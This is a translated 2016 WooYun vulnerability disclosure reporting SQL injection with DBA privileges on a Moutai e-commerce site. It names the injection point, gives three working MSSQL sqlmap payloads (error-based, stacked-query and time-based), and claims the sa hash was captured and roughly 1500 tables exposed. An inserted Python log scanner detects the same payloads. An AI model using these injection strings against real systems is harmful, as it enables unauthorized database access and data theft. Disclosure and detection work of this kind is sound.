
Vulnerability summary

Defect ID: wooyun-2016-0191800

Title: A Moutai e-commerce site has SQL injection with DBA privileges && 1500 tables && over 10 million records exposed && hashes captured

Affected vendor: emaotai.cn

Author: 猪猪虾

Submitted: 2016-04-02 15:10

Fixed: 2016-05-20 17:30

Published: 2016-05-20 17:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-04-02: Details sent to the vendor, awaiting the vendor's response
2016-04-05: Vendor confirmed; details disclosed to the vendor only
2016-04-15: Details disclosed to core white hats and domain experts
2016-04-25: Details disclosed to regular white hats
2016-05-05: Details disclosed to intern white hats
2016-05-20: Details disclosed to the public

Brief description:

A Moutai e-commerce site has SQL injection with DBA privileges && affects 1500 tables && over 10 million records exposed && hashes captured
Haven't been on the front page for a while

Detailed description:

Injection point: http://3g.emaotai.cn/
Payload (sqlmap output):

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: categoryId=&keyWord=dsafs')) AS NdHA WHERE 1215=1215 AND 5075=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5075=5075) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)))--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: categoryId=&keyWord=dsafs')) AS pxTB WHERE 9796=9796;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: categoryId=&keyWord=dsafs')) AS jHDe WHERE 2949=2949 WAITFOR DELAY '0:0:5'--
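For a defender triaging this report, the three sqlmap techniques above leave distinctive traces in the web server access log: CONVERT(INT, ...) for the error-based probe, WAITFOR DELAY for the time-based one, and a ";" before WAITFOR for the stacked query, all behind the same "')) AS <alias> WHERE n=n" prefix on the keyWord parameter. The following Python is an added example, not part of the original report or the vendor's code; the combined-format log lines, client IP addresses and timestamps are constructed here, with the report's own payloads URL-encoded as a search request would carry them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signatures for the three MSSQL techniques sqlmap reported against the keyWord
# parameter: error-based CONVERT(INT, ...), stacked/time-based WAITFOR DELAY,
# plus the ")) AS <alias> WHERE n=n" prefix and the trailing "--" comment.
SIGNATURES = {
    "mssql_error_based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "mssql_time_based": re.compile(r"WAITFOR\s+DELAY\s+'[\d:.]+'", re.I),
    "mssql_stacked": re.compile(r";\s*(WAITFOR|EXEC|SELECT|INSERT|UPDATE|DELETE)\b", re.I),
    "paren_close_alias": re.compile(r"\)\)\s+AS\s+\w+\s+WHERE\s+\d+=\d+", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}

# Apache/nginx combined-log prefix (constructed format): client IP ... "METHOD target HTTP/x".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def classify_request(target: str) -> dict:
    """Decode the query once (parse_qs unquotes and maps '+' to space); return {param: [signatures]}."""
    hits = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits

def scan_log(lines) -> list:
    """Return one finding per request whose parameters match any signature."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        sigs = classify_request(m.group("target"))
        if sigs:
            findings.append({"line": line_no, "ip": m.group("ip"), "signatures": sigs})
    return findings

# Constructed sample log: one benign search, then the report's three payloads URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Apr/2016:15:10:01 +0800] "GET /search?categoryId=&keyWord=moutai HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Apr/2016:15:10:02 +0800] "GET /search?categoryId=&keyWord=dsafs%27%29%29+AS+jHDe+WHERE+2949%3D2949+WAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Apr/2016:15:10:03 +0800] "GET /search?categoryId=&keyWord=dsafs%27%29%29+AS+NdHA+WHERE+1215%3D1215+AND+5075%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29-- HTTP/1.1" 500 812',
    '198.51.100.7 - - [02/Apr/2016:15:10:09 +0800] "GET /search?categoryId=&keyWord=dsafs%27%29%29+AS+pxTB+WHERE+9796%3D9796%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {f['signatures']}")
```

The time-based probe is also visible as a roughly five-second gap between consecutive requests from the same client, which is worth correlating with the signature hits.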


database management system users password hashes:
Database: drpecosdl
[237 tables]
Database: tempdb
[86 tables]
Database: DrpEco
[309 tables]




The sa hash has been captured!
Roughly 1500 tables, huge impact!

(screenshot: 数据1.png)


One of the tables alone holds over 3 million rows!
The privileges are high enough to dump every database!

Proof of vulnerability:

The above is proof enough! Friendly test.

Suggested fix:

You are the experts!

Copyright notice: when reposting, please credit the source: 猪猪虾@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-04-05 17:28

Vendor reply:

Thank you for your report; we will fix it as soon as possible.

Latest status:

None yet